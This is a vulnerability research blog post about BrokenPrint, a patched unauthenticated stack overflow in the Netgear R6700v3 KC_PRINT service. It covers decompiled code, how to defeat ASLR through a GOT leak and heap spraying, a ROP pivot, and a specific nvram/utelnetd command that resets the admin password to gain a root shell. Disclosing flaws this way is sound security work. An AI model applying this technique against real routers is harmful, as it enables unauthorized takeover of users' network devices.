BrokenPrint: A Netgear stack overflow

28 February 2022

Summary
Vulnerability details
Exploitation

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through an USB port. No configuration is needed to be made, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin password and start utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is, but it basically allows to access a USB printer through the Netgear router as if the printer were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init( attr);
  pthread_attr_setdetachstate( attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR,  optval, 4u) < 0 )
  {
    ...
  }
  memset( sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *) sin, 0x10u) < 0 )
  {
    ...
  }

  // accept up to 128 clients simultaneously
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock,  addr,  addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock( g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock( g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                     g_client_threads[thread_index],
                     attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock( g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy( attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled    !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads a HTTP-like request until it finds the end of the HTTP headers rnrn into a 1024-byte stack buffer. It then searches for a POST /USB URI and an _LQ string where usblp_index is an integer. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() won’t be shown for brevity but all it does is open the /proc/printer_status file, tries to read its content and tries to find an USB port by looking for a string like usblp%d. This will only be found if a printer is connected to the Netgear router, meaning it will never continue further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continuernrn");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continuernrn"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0 which is the one we are interested in.

  // /! does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "rn");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2)    (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copy the previously 8 bytes already read and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in the Response_Get_Jobs() at 0x102C4 which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows but it seems Response_Get_Jobs() was the most straight forward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_data is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset,  recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1    !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_data's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset,  recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy bytes indexes [8,74] from table keywords
  copied_len = memcpy_at_index(prefix_ptr, in_offset,  table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3    offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44    !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset,  recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 2048-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /! VULNERABILITY HERE /!
        memset(command, 0, sizeof(command));
        memcpy(command,  recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

It first starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1 which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs = 0 remains.

Above we see 2 memset() for 2 stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ). We craft client data to we make sure to validate the while ( recv_buf[offset] != 3 offset <= content_len ) condition to enter the loop.

We also need to set flag2 = 1 so we make sure to validate the conditions on the client data to enter the if ( recv_buf[offset] == 0x44 !flag2 ) condition.

Later inside the while loop if flag2 is set, then a 16-bit size (maximum is 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. Then, this size is used as the argument to memcpy when copying into a 64-byte stack buffer in memcpy(command, recv_buf[offset], copy_len). This is a stack-based overflow vulnerability where we control the overflowing size and content. There is no limitation on the values of the bytes to use for overflowing, which makes it a very nice vulnerability to exploit at first sight.

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.

Reaching the end of the function

It is now important to look at the stack layout from the command[] array we are overflowing from. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control any of the local variable’s values post-overflow. Remember that we are in the while loop at the moment so the initial idea would be to get out of this loop as soon as possible. By overwriting local variables and setting them to appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?

So after our overflowing memcpy(), we decide to set client data to hold the "job-id" command to simplify code paths being taken. Then we see the offset += copy_len statement. Since we control both copy_len and offset values due to our overflow, we can craft values to make us exit from the loop condition: while ( recv_buf[offset] != 3 offset <= content_len ) by setting offset = content_len+1 for instance.

Next we are executing the 2nd read_job_value() call due to bReadAllJobs == 0. The read_job_value() is not relevant for us but its purpose is to loop on all the printer’s jobs and save the requested data (in our case it would be the job-id). In our case, we assume there is no printer’s job at the moment so nothing will be read. This means the offset_job being returned is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3    offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /! VULNERABILITY HERE /!
        memset(command, 0, sizeof(command));
        memcpy(command,  recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }
  }                                             // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.

Finally, the 2 heap buffers pointed by prefix_ptr and final_ptr are freed and the function exits.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr 
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    //       the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can leak make it copy any size from any
    // address which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

KC_PRINT: not randomized
- .text: read/execute
- .data: read/write
Libraries: randomized
Heap: not randomized
Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables except we don’t overwrite the saved registers and the return address? Well it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT the client_sock could be different among KC_PRINT executions. However, once KC_PRINT is started, it will keep allocating the same client_sock for every connection as long as we closed the previous connection.

This is a perfect scenario for us since it means we can initially bruteforce the socket value by overflowing the entire stack frame (except the saved register and return value) until we get an HTTP response, and KC_PRINT will never crashes. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a valid heap address that is valid for free().

However after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why as we didn’t investigate for time reasons. However, this opens new opportunities. Indeed, the .got is at a static address due to KC_PRINT being compiled without PIE support. It means we can leak an imported function like memset() which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.

Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We also thought about changing the ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated in the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 points to our static region 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to retrieve the address of that command (also stored in that region) in order to set the first argument of system() (in r0) and then pivot to a new stack to that region that will make it finally return to system("any command")

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup sleep 4 utelnetd -d -i br0". This is very similar to the method that what was used in the Tokyo drift paper except that in our case we have more control since we are executing all the commands we want so we can set an arbitrary password as well as start the utelnetd process instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo drift paper and login to the web interface to re-set the password to the same password, so utelnetd takes into account our new password and we get a remote shell on the Netgear router.

Alex Plaskett